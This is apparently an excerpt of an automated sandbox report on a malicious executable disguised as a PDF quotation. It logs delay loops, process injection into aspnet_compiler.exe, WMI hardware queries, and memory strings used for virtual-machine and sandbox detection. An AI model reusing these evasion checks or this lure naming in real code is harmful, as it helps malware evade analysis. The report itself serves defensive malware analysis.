Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -594891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -594563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -594438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -594313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -594203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -594094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -593969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -593859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -593750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -593639s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -593530s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -593422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -593304s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6716	Thread sleep count: 1831 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 6716	Thread sleep count: 8005 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -599654s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -599544s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -599429s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -599317s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -598928s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -598777s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -598233s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -597027s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -596702s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -596180s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -596054s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -595779s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -595218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -594999s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -594671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -594562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -594453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -594343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -594234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -594125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -594015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 3976	Thread sleep time: -593906s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599886	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599523	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599405	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599082	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598616	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598493	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596353	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596200	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595927	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595799	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595686	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594094	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593969	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593859	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593750	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593639	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593530	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593422	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593304	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599654	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599429	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599317	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598928	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598777	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597027	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596180	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596054	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595779	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 593906	Jump to behavior

Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE7F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE7F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE7F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:Microsoft\|VMWare\|Virtual
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE7F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE7F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE7F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE7F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0Microsoft\|VMWare\|Virtual
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE7F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE7F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: aspnet_compiler.exe, 00000005.00000002.3400493487.00000229342C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW %SystemRoot%\system32\mswsock.dllers>
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE51D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: explorerESbieDll.dllFcuckoomon.dllGwin32_process.handle='{0}'HParentProcessIdIcmdJselect * from Win32_BIOS8Unexpected WMI query failureKversionLSerialNumberNVMware\|VIRTUAL\|A M I\|XenOselect * from Win32_ComputerSystemPmanufacturerQmodelRMicrosoft\|VMWare\|VirtualSjohnTannaUxxxxxxxx
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646512813.0000028ACC9A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process token adjusted: Debug			Jump to behavior
